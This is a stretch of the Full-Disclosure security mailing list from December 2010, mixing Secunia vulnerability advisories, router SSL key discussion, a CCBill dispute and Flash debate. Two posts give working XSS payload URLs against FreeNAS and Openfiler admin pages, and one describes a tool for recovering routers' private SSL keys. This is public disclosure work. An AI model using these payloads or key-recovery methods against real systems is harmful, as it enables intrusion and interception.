Re: [Full-disclosure] 10 OpenBSD facts and is timeline of Backdoor
Extreme Yodaism is my guess... guess more like locatting (icanhashotdog|icanhascheezburger).com -- Kind Regards Milan Berger Project-Mindstorm Technical Engineer -- project-mindstorm.net 90537 Feucht Germany http://www.androcom.net http://www.project-mindstorm.net twitter: http://twitter.com/twit4c ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CCBILL critical vulnerability story part II
hello FULL DISCLOSURE! We have found nice story about our previous ccbill advisory: http://gfy.com/showthread.php?t=982701page=2 CCBILL CEO Ron C has written: This report was a complete joke. This was just a variation of a Nigerian scam. We contacted the website and they responded via GMAIL if we would Western Union them 10k they would tell us what was wrong. LOL They create a fake security page and post stuff and hope companies will pay the blackmail money VIA WESTERN UNION (LOL) But hey if it is on the Internet it MUST BE TRUE. End of Story. @Ron C everything you wrote is a lie! We will release soon full ccbill story part #2 with CCBILL working exploits, all chat logs etc...i hope you and William Bell will like it :) You had enough time to fix all vulnerabilities (4 months). regards, Marcin Wrona Ariko-Security TEAM ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CCBILL critical vulnerability story part II
On Mon, Dec 20, 2010 at 9:27 AM, Maciej Gojny v...@ariko-security.com wrote: hello FULL DISCLOSURE! We have found nice story about our previous ccbill advisory: http://gfy.com/showthread.php?t=982701page=2 CCBILL CEO Ron C has written: This report was a complete joke. This was just a variation of a Nigerian scam. We contacted the website and they responded via GMAIL if we would Western Union them 10k they would tell us what was wrong. LOL They create a fake security page and post stuff and hope companies will pay the blackmail money VIA WESTERN UNION (LOL) Wow. Its unfortunate that the vendor did not respond. But in the US, legislation is such that its more cost effective to suffer the breach and then turn it over to PR ..., http://seclists.org/fulldisclosure/2010/Aug/188. Quod Erat Demonstrandum. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] www.eVuln.com : postid SQL Injection in Social Share
www.eVuln.com advisory: postid SQL Injection in Social Share Summary: http://evuln.com/vulns/166/summary.html Details: http://evuln.com/vulns/166/description.html ---Summary--- eVuln ID: EV0166 Software: Social Share Vendor: n/a Version: 2010-06-05 Critical Level: medium Type: SQL Injection Status: Unpatched. No reply from developer(s) PoC: Available Solution: Not available Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ ) Description It is possible to inject arbitrary SQL query using postid parameter in postview.php script. Parameter postid used in SQL query without any sanitation. Condition: magic_quotes: off PoC/Exploit PoC code is available at: http://evuln.com/vulns/166/exploit.html -Solution-- Not available --Credit--- Vulnerability discovered by Aliaksandr Hartsuyeu http://evuln.com/penetration-test.html - penetration testing service ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: SAP Crystal Reports Print ActiveX Control Buffer Overflow
== Secunia Research 14/12/2010 - SAP Crystal Reports Print ActiveX Control Buffer Overflow - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Crystal Reports 2008 SP3 Fix Pack 3.2 Print ActiveX (12.3.2.753) NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: Remote == 3) Vendor's Description of Software SAP Crystal Reports software enables you to easily design interactive reports and connect them to virtually any data source. Your users can benefit from on-report sorting and filtering giving them the power to execute decisions instantly. Product Link: http://www.sap.com/solutions/sap-crystal-solutions/index.epx == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in SAP Crystal Reports, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in the CrystalReports12.CrystalPrintControl.1 ActiveX control (PrintControl.dll) when processing the ServerResourceVersion property and can be exploited to cause a heap-based buffer overflow via an overly long string. Successful exploitation allows execution of arbitrary code. == 5) Solution Set the kill-bit for the affected ActiveX control. == 6) Time Table 19/11/2010 - Vendor notified. 19/11/2010 - Vendor response. 24/11/2010 - Vendor confirms the vulnerability. 14/12/2010 - Independent discovery and public disclosure by a third party. 14/12/2010 - Public disclosure. == 7) Credits Discovered by Dmitriy Pletnev, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-2590 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-135/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Default SSL Keys in Multiple Routers
From a security standpoint, it is. But it's easier and probably more cost effective for the manufacturer. Sometimes the key will be different between firmware versions, sometimes it won't. Sometimes the same key will be used for two different models. It just depends. Some models don't have hard coded keys, but most of the consumer grade stuff (and even some of the low-end business stuff) does. - Craig On Sun, Dec 19, 2010 at 12:17 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: These manufacturers use the same key on each of their models? That seems ridiculous to me... T -- From: Craig Heffner Sent: Sunday, December 19, 2010 5:56 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Default SSL Keys in Multiple Routers Many routers that provide an HTTPS administrative interface use default or hard-coded SSL keys that can be recovered by extracting the file system from the device's firmware. The LittleBlackBox project contains a database of over 2,000 (and growing) private SSL keys that are correlated with their respective public certificates, and hardware/firmware versions. While most of these certificates are from DD-WRT firmware, there are also private keys from other vendors including Cisco, Linksys, D-Link and Netgear. Private keys can be recovered by supplying LittleBlackBox with the corresponding public key. If the public key is not readily available, LittleBlackBox can retrieve the public certificate from a pcap file, live traffic capture, or by directly querying the target host. LittleBlackBox can be downloaded from http://littleblackbox.googlecode.com . More information is available at http://www.devttys0.com/2010/12/breaking-ssl-on-embedded-devices/. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] adobe.com important subdomain SQL injection again!
I think the number of vulnerabilities (According to CVE data by NVD) related to Flash Player and Adobe products should give an idea about what's going on : Number of CVE entries related to any Adobe product : 2006 : 31 2007 : 35 2008 : 64 2009 : 95 2010 : 207 More details : http://www.cvedetails.com/vendor/53/Adobe.html Number of Flash Player vulnerabilities: 2006 : 5 2007 : 10 2008 : 21 2009 : 20 2010 : 60 More details : http://www.cvedetails.com/product/6761/Adobe-Flash-Player.html?vendor_id=53 Regards Serkan Özkan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: RealPlayer AAC Spectral Data Parsing Vulnerability
== Secunia Research 10/12/2010 - RealPlayer AAC Spectral Data Parsing Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * RealPlayer SP 1.1.4 * RealPlayer Enterprise 2.1.2 * Mac RealPlayer 12.0.0.1444 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System compromise Where: Remote == 3) Vendor's Description of Software RealPlayer® SP lets you download video from thousands of Websites free! Just click on the download this video button above the video you want. It's just that easy. Now you can watch your favorite videos anywhere, anytime. Product Link: http://www.real.com/realplayer/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in RealPlayer, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by an error in the parsing of AAC audio content and can be exploited to corrupt memory via specially crafted spectral data. Successful exploitation may allow execution of arbitrary code. == 5) Solution Update to RealPlayer SP 1.1.5, RealPlayer Enterprise 2.1.3, and Mac RealPlayer 12.0.0.1548. == 6) Time Table 01/03/2010 - Vendor notified. 01/03/2010 - Vendor response. 11/03/2010 - Vendor provides status update. 19/10/2010 - Vendor provides status update. 29/11/2010 - Vendor provides status update. 10/12/2010 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-0125 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-15/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Good morning, you can xss freenas stable (0.7.2.5543).
Good morning, you can xss freenas stable (0.7.2.5543) like this http://192.168.0.1/quixplorer/index.php?action=listorder=namesrt=yeslang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E or this ... http://192.168.0.1/quixplorer/index.php?action=listorder=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Emesrt=yes etc. This will work regardless of the user being logged into the quixplorer module or freenas. -- question = ( to ) ? be : ! be; -- Wm. Shakespeare ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Default SSL Keys in Multiple Routers
These manufacturers use the same key on each of their models? That seems ridiculous to me... As a person who had a Siemens AP / router with a hardcoded, hidden management account on it, I find your surprise entertaining ;-) Craig, cool project. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] adobe.com important subdomain SQL injection again!
No real clue how Adobe will counter Flash 5. Perhaps they can use it as an opportunity to trim the beast down. -Original Message- From: Victor Rigo victor_r...@yahoo.com To: full-disclosure@lists.grok.org.uk Sent: Mon, Dec 20, 2010 12:56 am Subject: Re: [Full-disclosure] adobe.com important subdomain SQL injection again! Concurred. No file format is as obnoxious as SWF. However, with the debut of HTML 5, we're finding that video is being offloaded to video and open codecs are being integrated into browsers. Further, HTML 5's media capabilities are making flash cumbersome. Try disabling flash extension on Firefox and enjoy real internet. Victor Rigo, CISSP Independent Computer Security Consultant Buenos Aires, AR +5411-4316-1901 --- On Sun, 12/19/10, Christian Sciberras uuf6...@gmail.com wrote: From: Christian Sciberras uuf6...@gmail.com Subject: Re: [Full-disclosure] adobe.com important subdomain SQL injection again! To: Marsh Ray ma...@extendedsubset.com Cc: Victor Rigo victor_r...@yahoo.com, full-disclosure@lists.grok.org.uk Date: Sunday, December 19, 2010, 9:25 PM Personally, I kind of like Flash. It gives me a single kill switch for 90% of the useless blinking crap and popups on the internet. Flash is a really appropriate name for exactly what I don't want to see on a web page. I hope it remains the platform of choice for those who develop such things. - Marsh Ray I'll keep using that quote till I die... On Sun, Dec 19, 2010 at 9:32 PM, Marsh Ray ma...@extendedsubset.com wrote: On 12/18/2010 05:30 PM, Victor Rigo wrote: Let's see, flash is: - Cross-platform - Cross-architecture - Has it's own programming language - Is embedded on websites - Access to javascript to popup, local caches, etc. Not on my machine? It's not ineptness, it's what you get when you right software that can actually do stuff. Adobe comes from a time when you could write PC software without caring about security. Yeah, it was a heck of a lot easier to write just about anything back then because it was well and proper that anything could do anything. Nowdays, the first questions after hey our software could do this must be but should it do that? What else could someone leverage that new capability to do? How does it combine with every other feature in our app or even on the whole platform? What if somebody does it repeatedly in a tight loop? With pathological inputs? and so on. These questions take a long time to answer. So if a vendor is known for letting app developers do more stuff and not also known for letting users control what stuff gets done on their own machines then they are laggards, not leaders, in my view. If Java applets were still the hip thing, you'd see the same thing about that. There's undoubtedly some truth to that. But at the same time, it doesn't seem like a useful line of reasoning: * It's still not an argument for using Flash. * That Java plugins have had chronic security bugs doesn't mean that Flash doesn't suck too. * You seem to imply that you don't think that Adobe is likely to secure Flash any time soon. You're not saying Adobe will secure Flash in the next patch and then it will be great. But you listed all the great stuff it does, so I have to think you would have said something like that if you believed it. You may be making Flash look worse than it is. * It's basically an appeal to futility argument: no one could make a development platform and browser plugin that is significantly more secure (or does a better job of managing the security vs. doing stuff trade off) so therefore we should accept the status quo. That's why it's not useful: it gives no guidance on directions in which to improve. Personally, I kind of like Flash. It gives me a single kill switch for 90% of the useless blinking crap and popups on the internet. Flash is a really appropriate name for exactly what I don't want to see on a web page. I hope it remains the platform of choice for those who develop such things. - Marsh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ = ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: RealPlayer cook Arbitrary Free Vulnerability
== Secunia Research 10/12/2010 - RealPlayer cook Arbitrary Free Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * RealPlayer SP 1.1.4 * RealPlayer Enterprise 2.1.2 * Mac RealPlayer 11.1 * Linux RealPlayer 11.0.2.1744 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Vendor's Description of Software RealPlayer® SP lets you download video from thousands of Websites free! Just click on the download this video button above the video you want. It's just that easy. Now you can watch your favorite videos anywhere, anytime. Product Link: http://www.real.com/realplayer/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in RealPlayer, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused due to an error in the handling of errors encountered while decoding cook encoded audio content. This can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. Successful exploitation may allow execution of arbitrary code. == 5) Solution Update to RealPlayer SP 1.1.5, RealPlayer Enterprise 2.1.3, Mac RealPlayer 12.0.0.1444, and Linux RealPlayer 11.0.2.2315. == 6) Time Table 26/02/2010 - Vendor notified. 01/03/2010 - Vendor response. 11/03/2010 - Vendor provides status update. 19/10/2010 - Vendor provides status update. 29/11/2010 - Vendor provides status update. 10/12/2010 - Public disclosure. == 7) Credits Discovered by Alin Rad Pop, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-2579 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-14/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Default SSL Keys in Multiple Routers
LOL. Yeah, it seems like I get myself in this cycle of OMG, really? followed by maybe people are starting to learn and then back to disappointment. To be honest, this was something that I never really considered (shared, persistent keys on routers). In hindsight, it seems like an obvious concern, but it is still interesting. t -Original Message- From: Michal Zalewski [mailto:lcam...@coredump.cx] Sent: Monday, December 20, 2010 8:16 AM To: Thor (Hammer of God) Cc: Craig Heffner; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Default SSL Keys in Multiple Routers These manufacturers use the same key on each of their models? That seems ridiculous to me... As a person who had a Siemens AP / router with a hardcoded, hidden management account on it, I find your surprise entertaining ;-) Craig, cool project. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: Microsoft Office PICT Filter Integer Truncation Vulnerability
== Secunia Research 14/12/2010 - Microsoft Office PICT Filter Integer Truncation Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Office XP SP3 * Microsoft Office 2003 SP3 * Microsoft Office Converter Pack NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: System access Where: From remote == 3) Vendor's Description of Software Microsoft Office is a complete suite of productivity and database software that will help you save time and stay organized. Product Link: http://office.microsoft.com/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Office, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by an integer truncation error in the PICT import filter (PICTIM32.FLT). This can be exploited to cause a heap-based buffer overflow by e.g. tricking a user into importing a specially crafted PICT file. Successful exploitation may allow execution of arbitrary code. == 5) Solution Apply patches provided by MS10-105. == 6) Time Table 14/07/2009 - Vendor notified. 14/07/2009 - Vendor response. 20/08/2009 - Vendor provides status update. 24/09/2009 - Vendor provides status update (scheduled for fall 2009). 29/10/2009 - Vendor provides status update (scheduled for March 2010). 28/05/2010 - Vendor provides status update (slipped from March 2010 release and now scheduled for August 2010). 02/06/2010 - Vendor provides status update. 23/07/2010 - Vendor provides status update (slipped from August 2010 release and now scheduled for November 2010). 04/11/2010 - Vendor provides status update (slipped from November 2010 release and now scheduled for December 2010). 08/11/2010 - Vendor informed that December is the final deadline. 20/12/2010 - Public disclosure. == 7) Credits Discovered by Alin Rad Pop, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3946 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-34/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We
[Full-disclosure] Good morning again! - openfiler xss
Good morning again! -- openfiler xss: https://192.168.0.2:446/admin/system.html?step=2device=et%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Ebh0 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: Microsoft Office TIFF Image Converter Endian Conversion Vulnerability
== Secunia Research 14/12/2010 - Microsoft Office TIFF Image Converter - - Endian Conversion Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Office XP SP3 * Microsoft Office Converter Pack NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System compromise Where: Remote == 3) Vendor's Description of Software Microsoft Office is a complete suite of productivity and database software that will help you save time and stay organized. Product Link: http://office.microsoft.com/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Office, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused by an error in the TIFF Import/Export Graphic Filter (TIFFIM32.FLT) when converting the endianess of certain data. This can be exploited to corrupt memory via e.g. a specially crafted TIFF image. Successful exploitation may allow execution of arbitrary code when processing a TIFF image in an application using the graphics filter (e.g. opening the image in Microsoft Photo Editor or importing it into an Office document). == 5) Solution Apply patches provided by MS10-105. == 6) Time Table 09/07/2009 - Vendor notified. 09/07/2009 - Vendor response. 15/08/2009 - Vendor provides status update. 25/09/2009 - Vendor provides status update. 11/01/2010 - Status update requested. 11/01/2010 - Vendor provides status update (scheduled for May 2010). 30/04/2010 - Vendor provides status update (slipped from May 2010 release and now tentatively targetting August 2010). 23/07/2010 - Vendor provides status update (slipped from August 2010 release and now tentatively targetting November 2010). 11/08/2010 - Vendor provides status update. 04/11/2010 - Vendor provides status update (slipped from November 2010 release and now scheduled for December 2010). 08/11/2010 - Vendor informed that December is the final deadline. 14/12/2010 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3949 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-39/ Complete list of vulnerability reports published
[Full-disclosure] Secunia Research: Microsoft Office Document Imaging Endian Conversion Vulnerability
== Secunia Research 14/12/2010 - Microsoft Office Document Imaging Endian Conversion Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Office XP SP3 * Microsoft Office Converter Pack * Microsoft Works 9 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System compromise Where: Remote == 3) Vendor's Description of Software Microsoft Office is a complete suite of productivity and database software that will help you save time and stay organized. Product Link: http://office.microsoft.com/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Office, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused by missing input validation within a library used by the bundled Microsoft Office Document Imaging application when converting certain data during parsing of TIFF images. This can be exploited to corrupt memory via a TIFF image containing specially crafted IFD entries. Successful exploitation may allow execution of arbitrary code. == 5) Solution Apply patches provided by MS10-105. == 6) Time Table 09/07/2009 - Vendor notified. 09/07/2009 - Vendor response. 25/09/2009 - Vendor provides status update. 30/04/2010 - Vendor provides status update (tentatively targetting August 2010). 23/07/2010 - Vendor provides status update (slipped from August 2010 release and now scheduled for November 2010). 04/11/2010 - Vendor provides status update (slipped from November 2010 release and now scheduled for December 2010). 08/11/2010 - Vendor informed that December is the final deadline. 14/12/2010 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3950 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-31/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: Microsoft Office TIFF Image Converter Two Buffer Overflows
== Secunia Research 14/12/2010 - Microsoft Office TIFF Image Converter Two Buffer Overflows - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Office XP SP3 * Microsoft Office Converter Pack * Microsoft Works 9 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System compromise Where: Remote == 3) Vendor's Description of Software Microsoft Office is a complete suite of productivity and database software that will help you save time and stay organized. Product Link: http://office.microsoft.com/ == 4) Description of Vulnerability Secunia Research has discovered two vulnerabilities in Microsoft Office, which can be exploited by malicious people to compromise a user's system. 1) An input validation error in the TIFF Import/Export Graphic Filter when copying certain data can be exploited to cause a heap-based buffer overflow via a specially crafted TIFF image. 2) Another input validation error in the TIFF Import/Export Graphic Filter when copying certain data after having encountered a specific error can be exploited to cause a heap-based buffer overflow via a specially crafted TIFF image. Successful exploitation of the vulnerabilities may allow execution of arbitrary code when processing a TIFF image in an application using the graphics filter (e.g. opening the image in Microsoft Photo Editor or importing it into an Office document). == 5) Solution Apply patches provided by MS10-105. == 6) Time Table 07/07/2010 - Vendor notified about vulnerability #1. 08/07/2010 - Vendor notified about vulnerability #2. 08/07/2010 - Vendor response. 15/08/2010 - Vendor provides status update. 11/01/2010 - Status update requested. 11/01/2010 - Vendor provides status update (tentatively targetting May 2010). 30/04/2010 - Vendor provides status update (slipped from May 2010 release and now tentatively targetting August 2010). 23/07/2010 - Vendor provides status update (slipped from August 2010 release and now scheduled for November 2010). 04/11/2010 - Vendor provides status update (slipped from November 2010 release and now scheduled for December 2010). 08/11/2010 - Vendor informed that December is the final deadline. 14/12/200X - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3947 for the vulnerabilities. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/
Re: [Full-disclosure] adobe.com important subdomain SQL injection again!
On 12/19/2010 09:32 PM, John Jester wrote: Sandboxing the plug-in from your system fixes it I believe. It's so futile sandboxing it was key. OK, so if sandboxing works, then why not just let devs build x86/x64 code in the first place? In the same category as Native Client or ActiveX. Maybe because sandboxing isn't going to work so well? And security, hell a multi-billion dollar company can't keep it from gobbling up 100% cpu in some instances. Huge note: over the years has been massive improvement in both performance and security. I wonder how much of that is the game or app itself in a tight loop. CPU is, after all, there to be used. It's not hopeless or futile, but come on, it's like the titanic. Remember chapter 1 of the textbook when it said The first rule of security is never try to retrofit security, _ever_!! and underlined it three times? Well see back in 1996 there were these really popular animation and multimedia CD-ROM authoring packages and... the rest is history. - Marsh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:258 ] mozilla-thunderbird
